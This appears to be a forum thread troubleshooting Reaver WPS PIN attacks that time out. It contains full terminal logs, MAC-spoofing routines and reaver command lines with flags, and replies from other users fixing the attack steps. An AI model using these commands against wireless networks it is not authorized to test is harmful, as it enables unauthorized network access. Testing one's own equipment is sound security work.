Results 1 to 12 of 12

Thread: Reaver WPS Timeouts

  1. #1
    Join Date
    2015-Oct
    Location
    United States
    Posts
    18

    Reaver WPS Timeouts

    I am not sure what I'm doing wrong but I can not get reaver to crack my WPS.
    When I issue the command it times out, I'm sitting right next to the router with WPS enabled on channel 1 and the key is 12345670.
    I am about 10ft away from the AP.

    I think my terminal log will be most effective in explaining what's going on:

    Code:
    root@kali:~# ifconfig wlan0 down
    root@kali:~# iwconfig wlan0 mode monitor
    root@kali:~# macchanger -r wlan0
    Current MAC:   XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    Permanent MAC: XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    New MAC:       86:38:61:XX:XX:XX (unknown)
    root@kali:~# airmon-ng check kill
    Killing these processes:
    
      PID Name
      752 dhclient
      947 wpa_supplicant
    
    root@kali:~# ifconfig wlan0 up
    root@kali:~# airmon-ng check kill
    
    root@kali:~# airmon-ng start wlan0
    No interfering processes found
    PHY	Interface	Driver		Chipset
    
    phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n
    		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    		(mac80211 station mode vif disabled for [phy0]wlan0)
    
    
    root@kali:~# airodump-ng --bssid 9XX:XX:XX:XX:XX:XX --wps -c 1 wlan0mon
    
     CH  1 ][ Elapsed: 18 s ][ 2015-10-21 11:11                                         
                                                                                                                            
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                            
     XX:XX:XX:XX:XX:XX  -45   0        6        3    0   1  54e  WPA2 CCMP   PSK  1.0     <length:  7>                      
                                                                                                                            
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                              
                                                                                                                            
    
    root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -w -N -A -P -T 0.5 -x 360 -K 1
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Switching wlan0mon to channel 1
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: (null))
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~#

  2. #2
    Join Date
    2015-Apr
    Posts
    29
    What a type of router manufacturers?
    Reaver may think I attack no hidden networks.

    If you know the ESSID, then give this in Reaver with -e --essid = <SSID>

  3. #3
    Join Date
    2013-Oct
    Posts
    321
    Quote Originally Posted by Tritium View Post
    I am not sure what I'm doing wrong but I can not get reaver to crack my WPS.
    When I issue the command it times out, I'm sitting right next to the router with WPS enabled on channel 1 and the key is 12345670.
    I am about 10ft away from the AP.

    I think my terminal log will be most effective in explaining what's going on:

    Code:
    root@kali:~# ifconfig wlan0 down
    root@kali:~# iwconfig wlan0 mode monitor
    root@kali:~# macchanger -r wlan0
    Current MAC:   XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    Permanent MAC: XX:XX:XX:XX:XX:XX (TP-LINK TECHNOLOGIES CO.,LTD.)
    New MAC:       86:38:61:XX:XX:XX (unknown)
    root@kali:~# airmon-ng check kill
    Killing these processes:
    
      PID Name
      752 dhclient
      947 wpa_supplicant
    
    root@kali:~# ifconfig wlan0 up
    root@kali:~# airmon-ng check kill
    
    root@kali:~# airmon-ng start wlan0
    No interfering processes found
    PHY	Interface	Driver		Chipset
    
    phy0	wlan0		ath9k_htc	Atheros Communications, Inc. AR9271 802.11n
    		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    		(mac80211 station mode vif disabled for [phy0]wlan0)
    
    
    root@kali:~# airodump-ng --bssid 9XX:XX:XX:XX:XX:XX --wps -c 1 wlan0mon
    
     CH  1 ][ Elapsed: 18 s ][ 2015-10-21 11:11                                         
                                                                                                                            
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                            
     XX:XX:XX:XX:XX:XX  -45   0        6        3    0   1  54e  WPA2 CCMP   PSK  1.0     <length:  7>                      
                                                                                                                            
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                              
                                                                                                                            
    
    root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -w -N -A -P -T 0.5 -x 360 -K 1
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from XX:XX:XX:XX:XX:XX
    [+] Switching wlan0mon to channel 1
    [+] Associated with XX:XX:XX:XX:XX:XX (ESSID: (null))
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C
    [+] Nothing done, nothing to save.
    root@kali:~#
    Try this:

    airmon-ng check kill
    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up

    airmon-ng start wlan0

    ifconfig wlan0mon down
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    ifconfig wlan0mon up

    reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -w -N -A -P -T 0.5 -x 360 -K 1 --mac=00:11:22:33:44:55
    Last edited by slim76; 2015-10-22 at 12:08.

  4. #4
    Join Date
    2015-Oct
    Location
    texas
    Posts
    6
    having the same problem i get this


    root@kali:~# airmon-ng check
    No interfering processes found
    root@kali:~# ifconfig wlan0 down
    root@kali:~#
    root@kali:~# ifconfig wlan0 hw ether 00:11:22:33:44:55
    root@kali:~# ifconfig wlan0 up
    root@kali:~# airmon-ng start wlan0
    No interfering processes found
    PHY Interface Driver Chipset

    phy0 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187
    (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    (mac80211 station mode vif disabled for [phy0]wlan0)


    root@kali:~# ifconfig wlan0mon down
    root@kali:~# ifconfig wlan0mon hw ether 00:11:22:33:44:55
    SIOCSIFHWADDR: Invalid argument

  5. #5
    Join Date
    2016-Jul
    Posts
    2
    hi guys im using kali 2016.1 with everything ou of the box aircrack 1.2 RC3 reaver 1.5.3 etc.. my wifi adapter is a intel 5100 agn with monitor on and packet injection tested with aireplay. But every time i try reaver i keep receiving the M1-M2 message then nothing its says receive time out occur then i tried wifite with no succes at all the only thing that seemed to work was the WPs pins attack but i had 0/12000 success/ttl with no percentage on the side of it so im guessing its not working...then i tries the pixie dust attact but does exactly the same as reaver i kill every pid before airmon-ng to get the wlan0mon on even try with mdk3 attack but it says the device seems to be unvunerable so my guess is that the connection drop somewhere and i cannot get the M3 - M4 M5 m6 and so the get the eapol correctly even wash -i tells me that i got a lot of fcs bad packets so guys plz help me here im trying the same wifi as i used to with ubuntu 12.04 but back then i had the ath9 im really desesperate here
    i tried downgrading the reaver 1.4- 1.3 and then back to 1.5.3 with the libpcap0.8 older but with no luck at all now the tcpdump doesnt work so no pixie dust attack no more
    I only that the process goes faster when i use aireplay to send association but no luck on any m3m4m5 eapol messages

  6. #6
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    You need to know the SSID. Reaver needs the SSID to associate and without it you will continuously fail to associate (Reaver will say it is successful if you use -A, it assumes you are associating by other means).

  7. #7
    Join Date
    2013-Jul
    Posts
    844
    To rev1500

    Try this to avoid the SIOCSIFHWADDR: Invalid argument

    ifconfig wlan0 down
    ifconfig wlan0 hw ether 00:11:22:33:44:55
    ifconfig wlan0 up
    airmon-ng start wlan0

    ifconfig wlan0mon down
    iwconfig wlan0mon mode manage
    ifconfig wlan0mon hw ether 00:11:22:33:44:55
    sleep 2 # Only if in script, if done from command line not rqr
    iwconfig wlan0mon mode monitor
    ifconfig wlan0mon up

    Musket Teams

  8. #8
    Join Date
    2013-Jul
    Posts
    844
    To Slim 76

    There are several errors in your mac changing routines which may be causing you trouble.

    If you wish to mac change you also need to also mac change the wlan0mon

    See the routine in the thread above for an example

    You also need to add the spoofed mac address to your reaver command line with the --mac= command

    If your spoofed mac address is left out or the address in the reaver command line if different from the actual spoofed mac address then the reaver attack will fail. You will only get the WPS pin not the WPA key.

    If you use the -r command you will have to note the mac address and add it to the reaver command line.

    Musket Teams

  9. #9
    Join Date
    2016-Jul
    Posts
    17
    Captura de pantalla de 2016-07-28 00-18-03.jpg i thanks in advance for the help

  10. #10
    Join Date
    2016-Jul
    Posts
    17
    im kind a new on this....
    and i will like to ask..
    how do you post part of the log....???
    i doesnt let me....

  11. #11
    Join Date
    2016-Jul
    Posts
    1
    Guys i have done every step you said carefully and this is what i get:
    [+] Waiting for beacon from XX:XX:XX:XX:XX
    [+] Switching wlan0mon to channel 1
    [+] Associated with XX:XX:XX:XX:XX (ESSID: XXX)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request

    What should i do to fix this please?
    Also when i run airmon-ng start my internet goes off, how can i fix this?

  12. #12
    bbcode has some limitations here and doesn't handle correctly the brackets when you use them inside the code option
    get read of the brackets from reaver stdout, it should let you post your log.
    Do not use check kiill to activat mode monitor if you want network manger to work
    If you have a single wifi interface and you are connected to it you will loose connection anyway.
    Last edited by kcdtv; 2016-07-31 at 17:49.

Similar Threads

  1. [Reaver][Kali 2016] Reaver Association Issues (Code 18)
    By h4ck0ry in forum General Archive
    Replies: 3
    Last Post: 2016-07-06, 11:54

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •